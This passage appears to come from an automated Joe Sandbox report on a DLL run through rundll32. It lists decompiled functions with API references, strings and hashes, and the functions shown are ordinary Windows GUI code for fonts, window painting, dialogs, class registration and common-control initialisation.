Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseOpen$QueryValue
String ID: CLSID$InProcServer32
API String ID: 3523390698-323508013
Opcode ID: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
Instruction ID: 98c4733b419a9a9fcc8d3b331f1c0e54a211d8c73680194401ba1897b1518396
Opcode Fuzzy Hash: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
Instruction Fuzzy Hash: A511297680012DBFEF02EFA5CC80DEEBBB9EF446A0F114122FA05A6150D7719B51DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10036531 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10036531() {
				struct HWND__* _v4;
				void* _v68;
				void* _v76;
				int _t4;
				int _t10;
				struct HDC__* _t15;
				void* _t18;

				_t4 =  *0x1004b8cc; // 0xffffffff
				if(_t4 == 0xffffffff) {
					_t15 = GetDC(0);
					_v4 = 0;
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_v68 = SelectObject(_t15, _t18);
					}
					GetCharWidthA(_t15, 0x36, 0x36, 0x1004b8cc);
					if(_t18 != 0) {
						SelectObject(_t15, _v76);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t15);
					_t10 =  *0x1004b8cc; // 0xffffffff
					return _t10;
				}
				return _t4;
			}

0x10036532
0x1003653a
0x10036561
0x10036563
0x1003657a
0x1003657e
0x10036584
0x10036584
0x10036592
0x1003659a
0x100365a1
0x100365a4
0x100365a4
0x100365ac
0x100365b2
0x00000000
0x100365ba
0x100365bc

APIs

GetDC.USER32(00000000), ref: 10036543
GetSystemMetrics.USER32 ref: 10036567
CreateFontA.GDI32(00000000,?,?,?,?,?,10036A10,?,?,?,?,?,?,?), ref: 1003656E
SelectObject.GDI32(00000000,00000000), ref: 10036582
GetCharWidthA.GDI32(00000000,00000036,00000036,1004B8CC), ref: 10036592
SelectObject.GDI32(00000000,?), ref: 100365A1
DeleteObject.GDI32(00000000), ref: 100365A4
ReleaseDC.USER32 ref: 100365AC

Strings

Marlett, xrefs: 10036549

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
String ID: Marlett
API String ID: 1397664628-3688754224
Opcode ID: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
Instruction ID: 1088ce7175f154466d6028c012866e6bff604f09a65bd199e6d5657c5750c08b
Opcode Fuzzy Hash: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
Instruction Fuzzy Hash: 5D014071542634BFE2269B668C8CD9B7FACEF467E5F104518F209DA152CB614900CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 1002F6AD Relevance: 15.1, APIs: 10, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002F6AD(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				long _t39;
				int _t42;
				int _t43;
				int _t62;
				int _t66;
				void* _t68;
				long _t69;
				int _t71;

				_t69 = _a4;
				_t68 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t69);
				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t68 + 0x1c),  &_v24);
					_t42 = _a4;
					_t66 =  *(_t42 + 0x10);
					_t71 = _v24.right - _v24.left;
					_t62 = _v24.bottom - _v24.top;
					_t43 =  *(_t42 + 0x14);
					_v8 = _t66;
					_a4 = _t43;
					if(_t66 != _t71 && ( *(_t68 + 0x7d) & 0x00000004) != 0) {
						SetRect( &_v24, _t66 -  *0x1004efa0, 0, _t66, _t43);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						SetRect( &_v24, _t71 -  *0x1004efa0, 0, _t71, _a4);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						_t66 = _v8;
						_t43 = _a4;
					}
					if(_t43 != _t62 && ( *(_t68 + 0x7d) & 0x00000008) != 0) {
						SetRect( &_v24, 0, _t43 -  *0x1004efa4, _t66, _t43);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						SetRect( &_v24, 0, _t62 -  *0x1004efa4, _v8, _t62);
						_t43 = InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
					}
					return _t43;
				}
				return _t39;
			}

APIs

DefWindowProcA.USER32(?,00000046,00000000,?), ref: 1002F6C2
GetWindowRect.USER32 ref: 1002F6DA
SetRect.USER32 ref: 1002F714
InvalidateRect.USER32(?,?,00000001), ref: 1002F723
SetRect.USER32 ref: 1002F73A
InvalidateRect.USER32(?,?,00000001), ref: 1002F749
SetRect.USER32 ref: 1002F774
InvalidateRect.USER32(?,?,00000001), ref: 1002F77F
SetRect.USER32 ref: 1002F796
InvalidateRect.USER32(?,?,00000001), ref: 1002F7A1

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$Invalidate$Window$Proc
String ID:
API String ID: 570070710-0
Opcode ID: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
Instruction ID: 759c21b255db7c4f0b51d9d2c83ad8eda26887521645a94a827a2b7369984522
Opcode Fuzzy Hash: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
Instruction Fuzzy Hash: C631C972900259BFEB01DFA5DD88FAE7BB8EB04344F504125FA01AB5A1D770AE54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10020B9B Relevance: 15.1, APIs: 10, Instructions: 81
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10020B9B() {
				signed int _t39;
				CHAR* _t43;
				int _t44;
				WNDCLASSA* _t63;
				void* _t71;
				void* _t73;

				E10011BF0(0x1003a552, _t71);
				_t63 =  *(_t71 + 8);
				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
					if(RegisterClassA(_t63) == 0) {
						L5:
						_t39 = 0;
					} else {
						 *(_t71 - 0x18) = 1;
						if( *((char*)(E100373B5() + 0x14)) == 0) {
							L10:
							_t39 =  *(_t71 - 0x18);
						} else {
							E10037A1B(1);
							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
							_t43 = E100373B5() + 0x34;
							 *(_t71 - 0x14) = _t43;
							_t44 = lstrlenA(_t43);
							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
							if(_t44 + _t13 < 0x1000) {
								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
								if( *(_t71 + 8) + lstrlenA(_t63->lpszClassName) + 2 >= 0x1000) {
									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
								} else {
									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
									 *(_t71 + 0xa) = 0xa;
									 *((char*)(_t71 + 0xb)) = 0;
									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
								}
								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
								E10037A7E(1);
								goto L10;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t39 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return _t39;
			}

APIs

__EH_prolog.LIBCMT ref: 10020BA0
GetClassInfoA.USER32 ref: 10020BBB
RegisterClassA.USER32 ref: 10020BCE
lstrlenA.KERNEL32(-00000034,00000001), ref: 10020C0A
lstrlenA.KERNEL32(?), ref: 10020C11

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Classlstrlen$H_prologInfoRegister
String ID:
API String ID: 3690589370-0
Opcode ID: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
Instruction ID: 82e8c60a7f039037d0512a7f8540e8a50fdd43c9c42e3a44aee07f30fd402b66
Opcode Fuzzy Hash: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
Instruction Fuzzy Hash: 6B31AE75904219AFDB12DFA0CD85BADBFB9FF04355F104516F805A6162C734AA10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001F0D1 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1001F0D1(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				intOrPtr* _t68;
				signed int _t74;
				signed int _t76;
				struct HWND__* _t77;
				signed int _t80;
				int _t96;
				signed int _t97;
				intOrPtr* _t107;
				signed int _t116;
				signed int _t135;
				DLGTEMPLATE* _t136;
				struct HWND__* _t138;
				void* _t139;
				void* _t141;

				_t109 = __ecx;
				E10011BF0(0x1003a3de, _t139);
				_t107 = __ecx;
				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0x3c;
				 *((intOrPtr*)(_t139 - 0x20)) = __ecx;
				if( *(_t139 + 0x10) == 0) {
					 *(_t139 + 0x10) =  *(E100373B5() + 0xc);
				}
				_t135 =  *(E100373B5() + 0x1038);
				 *(_t139 - 0x28) = _t135;
				 *(_t139 - 0x14) = 0;
				 *((intOrPtr*)(_t139 - 0x24)) = 0;
				 *(_t139 - 4) = 0;
				E10021D47(_t109, 0x10);
				E10021D47(_t109, 0x7c000);
				if(_t135 == 0) {
					_t136 =  *(_t139 + 8);
					L7:
					__eflags = _t136;
					if(__eflags == 0) {
						L4:
						_t67 = 0;
						L32:
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
						return _t67;
					}
					_t68 = E100243B2();
					_t129 =  *_t68;
					 *((intOrPtr*)(_t139 - 0x1c)) =  *((intOrPtr*)( *_t68 + 0xc))() + 0x10;
					 *(_t139 - 4) = 1;
					 *((intOrPtr*)(_t139 - 0x18)) = 0;
					__eflags = E10024A3D(_t107, 0, __eflags, _t136, _t139 - 0x1c, _t139 - 0x18);
					__eflags =  *0x1004efe4; // 0x0
					_t74 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t74;
						if(_t74 == 0) {
							L17:
							 *(_t107 + 0x40) =  *(_t107 + 0x40) | 0xffffffff;
							 *(_t107 + 0x38) =  *(_t107 + 0x38) | 0x00000010;
							_push(_t107);
							E100237EE();
							_t76 =  *(_t139 + 0xc);
							__eflags = _t76;
							if(_t76 != 0) {
								_t77 =  *(_t76 + 0x1c);
							} else {
								_t77 = 0;
							}
							_t138 = CreateDialogIndirectParamA( *(_t139 + 0x10), _t136, _t77, E1001EB68, 0);
							E100014B0( *((intOrPtr*)(_t139 - 0x1c)) + 0xfffffff0, _t129);
							_t116 =  *(_t139 - 0x28);
							 *(_t139 - 4) =  *(_t139 - 4) | 0xffffffff;
							__eflags = _t116;
							if(_t116 != 0) {
								 *((intOrPtr*)( *_t116 + 0x14))(_t139 - 0x48);
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)( *_t107 + 0x12c))(0);
								}
							}
							_t80 = E10022196();
							__eflags = _t80;
							if(_t80 == 0) {
								 *((intOrPtr*)( *_t107 + 0x114))();
							}
							__eflags = _t138;
							if(_t138 != 0) {
								__eflags =  *(_t107 + 0x38) & 0x00000010;
								if(( *(_t107 + 0x38) & 0x00000010) == 0) {
									DestroyWindow(_t138);
									_t138 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t139 - 0x14);
							if( *(_t139 - 0x14) != 0) {
								GlobalUnlock( *(_t139 - 0x14));
								GlobalFree( *(_t139 - 0x14));
							}
							__eflags = _t138;
							_t60 = _t138 != 0;
							__eflags = _t60;
							_t67 = 0 | _t60;
							goto L32;
						}
						L15:
						E10024A0E(_t139 - 0x38, _t136);
						 *(_t139 - 4) = 2;
						E10024970(_t107, _t139 - 0x38, 0, _t136,  *((intOrPtr*)(_t139 - 0x18)));
						 *(_t139 - 0x14) = E10024724(_t139 - 0x38);
						 *(_t139 - 4) = 1;
						E10024716(_t139 - 0x38);
						__eflags =  *(_t139 - 0x14);
						if( *(_t139 - 0x14) != 0) {
							_t136 = GlobalLock( *(_t139 - 0x14));
						}
						goto L17;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L15;
					}
					_t96 = GetSystemMetrics(0x2a);
					__eflags = _t96;
					if(_t96 == 0) {
						goto L17;
					}
					_t97 = E10011CB0(_t107, 0,  *((intOrPtr*)(_t139 - 0x1c)), "MS Shell Dlg");
					asm("sbb al, al");
					_t74 =  ~_t97 + 0x00000001 & 0x000000ff;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t139 - 0x18)) - 8;
					if( *((short*)(_t139 - 0x18)) == 8) {
						 *((intOrPtr*)(_t139 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t139 - 0x48);
				if( *((intOrPtr*)( *_t107 + 0x12c))() != 0) {
					_t136 =  *((intOrPtr*)( *_t135 + 0x10))(_t139 - 0x48,  *(_t139 + 8));
					goto L7;
				}
				goto L4;
			}

APIs

__EH_prolog.LIBCMT ref: 1001F0D6
GetSystemMetrics.USER32 ref: 1001F19A
GlobalLock.KERNEL32 ref: 1001F205
CreateDialogIndirectParamA.USER32(?,?,?,Function_0001EB68,00000000), ref: 1001F234

Strings

MS Shell Dlg, xrefs: 1001F1A4

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 2364537584-76309092
Opcode ID: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
Instruction ID: 46954fd45d3ebabc0cd1c103719a3d91ff65dea30fed852b23a269951fd2c375
Opcode Fuzzy Hash: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
Instruction Fuzzy Hash: A951AE35900209DFCB11DFA4D8859FEBBB5EF54350F21466AF456EB292DB309E80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10023123 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E10023123(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __ebp;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t37;
				void* _t41;
				void* _t44;

				_t29 = __ebx;
				_push(__ecx);
				_t37 = __ecx;
				_t12 = E10023092(__ecx);
				_t34 = _a4 & 0x0000fff0;
				_t41 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L12:
					if(_a8 != 0x75 || _t41 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E1002040A(_t41);
						L11:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L12;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t41 != 0) {
							_push(_t29);
							_t30 =  *(_t37 + 0x1c);
							_v8 = GetFocus();
							E100220EE(_t44, SetActiveWindow( *(_t41 + 0x1c)));
							SendMessageA( *(_t41 + 0x1c), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L11;
				} else {
					goto L15;
				}
			}

APIs

GetFocus.USER32 ref: 10023173
SetActiveWindow.USER32(?), ref: 10023185
SendMessageA.USER32 ref: 1002319B
IsWindow.USER32(?), ref: 100231A8
SetActiveWindow.USER32(?), ref: 100231AF
IsWindow.USER32(?), ref: 100231B4
SetFocus.USER32(?), ref: 100231BE

Strings

u, xrefs: 100231C9

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
Instruction ID: 4dd9d1b88c5e5c3b3a68c724072b9ea331201f72bd5375ef8a8f6a79988825c8
Opcode Fuzzy Hash: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
Instruction Fuzzy Hash: 53113832A0021DBFDB21DF75EC4595E7BA4EF41390B80C822ED02D61A6DA34ED60CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10024970 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10024970(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				intOrPtr _t14;
				void* _t15;
				int _t24;
				char* _t30;
				struct HDC__* _t32;

				_t14 =  *0x1004c470; // 0x12db9c4b
				_t32 = GetStockObject;
				_t24 = 0xa;
				_v8 = _t14;
				_v72 = __ecx;
				_t30 = "System";
				_t15 = GetStockObject(0x11);
				if(_t15 != 0) {
					L2:
					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
						_t30 =  &_v40;
						_t32 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
						ReleaseDC(0, _t32);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t24;
					}
					return E100117AE(E10024838(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
				}
				_t15 = GetStockObject(0xd);
				if(_t15 == 0) {
					goto L6;
				}
				goto L2;
			}

APIs

GetStockObject.GDI32(00000011), ref: 10024994
GetStockObject.GDI32(0000000D), ref: 1002499C
GetObjectA.GDI32(00000000,0000003C,?), ref: 100249A9
GetDC.USER32(00000000), ref: 100249B8
GetDeviceCaps.GDI32(00000000,0000005A), ref: 100249CC
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 100249D8
ReleaseDC.USER32 ref: 100249E3

Strings

System, xrefs: 1002498F, 100249F9

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
Instruction ID: 93baf42c8ba0638d3e86fd25d7fd089804823e0dcc4687e6d17ef0450da081f3
Opcode Fuzzy Hash: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
Instruction Fuzzy Hash: F5114F31A40228EFEB01DBA1DD85FAE7BB8FB45785F410019F605EA191DBB49D42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1002155E Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E1002155E(signed int _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed int _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,10021FE1,?,00040000), ref: 10021567
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 10021570
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 10021584
#17.COMCTL32 ref: 1002159F
#17.COMCTL32 ref: 100215BB
FreeLibrary.KERNEL32(00000000), ref: 100215C8

Strings

InitCommonControlsEx, xrefs: 1002157C
COMCTL32.DLL, xrefs: 10021561, 10021566, 1002156D

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
Instruction ID: b13861e3b3a9cf7542cab635660fc4a1c16e305f76032743bd7b4f367fd9abdc
Opcode Fuzzy Hash: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
Instruction Fuzzy Hash: BDF0317A604A76DFE2029FA6AC8894FB6ECEFD1291B024566F901E7251CB24DC0187A1

Uniqueness

Uniqueness Score: -1.00%

Function 1001C425 Relevance: 13.8, APIs: 9, Instructions: 291
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1001C425(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t94;
				int _t95;
				int _t98;
				short* _t106;
				int _t109;
				short* _t111;
				short* _t118;
				short* _t119;
				short* _t126;
				char* _t132;
				char* _t133;
				long _t139;
				int _t141;
				int _t142;
				int _t143;
				int _t144;
				char _t154;
				char _t156;
				short* _t159;
				short* _t160;
				short* _t162;
				int _t165;
				void* _t166;
				void* _t167;
				short* _t168;
				void* _t173;

				_push(0x40);
				_push(0x10042fa0);
				E10012514(__ebx, __edi, __esi);
				_t94 =  *0x1004c470; // 0x12db9c4b
				 *((intOrPtr*)(_t167 - 0x1c)) = _t94;
				_t162 = 0;
				_t165 = 1;
				_t173 =  *0x1004f8b0 - _t162; // 0x0
				if(_t173 == 0) {
					if(CompareStringW(0, 0, 0x10042704, 1, 0x10042704, 1) == 0) {
						_t139 = GetLastError();
						__eflags = _t139 - 0x78;
						if(_t139 == 0x78) {
							 *0x1004f8b0 = 2;
						}
					} else {
						 *0x1004f8b0 = 1;
					}
				}
				if( *(_t167 + 0x14) > _t162) {
					 *(_t167 + 0x14) = E1001C409( *(_t167 + 0x10),  *(_t167 + 0x14));
				}
				_t95 =  *(_t167 + 0x1c);
				if(_t95 > _t162) {
					_t95 = E1001C409( *(_t167 + 0x18), _t95);
					 *(_t167 + 0x1c) = _t95;
				}
				_t144 =  *0x1004f8b0; // 0x0
				_t141 = 2;
				if(_t144 == _t141 || _t144 == _t162) {
					 *(_t167 - 0x38) = _t162;
					__eflags =  *(_t167 + 8) - _t162;
					if( *(_t167 + 8) == _t162) {
						_t109 =  *0x1004f724; // 0x0
						 *(_t167 + 8) = _t109;
					}
					_t142 =  *(_t167 + 0x20);
					__eflags = _t142 - _t162;
					if(_t142 == _t162) {
						_t142 =  *0x1004f734; // 0x0
					}
					_t166 = E1001A444(_t142,  *(_t167 + 8));
					__eflags = _t166 - 0xffffffff;
					if(_t166 != 0xffffffff) {
						__eflags = _t166 - _t142;
						if(__eflags == 0) {
							L67:
							_t165 = CompareStringA( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 + 0x10),  *(_t167 + 0x14),  *(_t167 + 0x18),  *(_t167 + 0x1c));
							__eflags = _t162;
							if(__eflags != 0) {
								_push(_t162);
								E100107C8(_t142, _t162, _t165, __eflags);
								_push( *(_t167 - 0x38));
								E100107C8(_t142, _t162, _t165, __eflags);
							}
							goto L69;
						}
						_push(0);
						_push(0);
						_push(_t167 + 0x14);
						_push( *(_t167 + 0x10));
						_push(_t166);
						_push(_t142);
						_t162 = E1001A487(_t142, _t162, _t166, __eflags);
						__eflags = _t162;
						if(__eflags == 0) {
							goto L61;
						}
						_push(0);
						_push(0);
						_push(_t167 + 0x1c);
						_push( *(_t167 + 0x18));
						_push(_t166);
						_push(_t142);
						_t106 = E1001A487(_t142, _t162, _t166, __eflags);
						 *(_t167 - 0x38) = _t106;
						__eflags = _t106;
						if(__eflags != 0) {
							 *(_t167 + 0x10) = _t162;
							 *(_t167 + 0x18) =  *(_t167 - 0x38);
							goto L67;
						}
						_push(_t162);
						E100107C8(_t142, _t162, _t166, __eflags);
					}
					goto L61;
				} else {
					if(_t144 != _t165) {
						L61:
						_t98 = 0;
						L70:
						return E1001254F(E100117AE(_t98,  *((intOrPtr*)(_t167 - 0x1c))));
					}
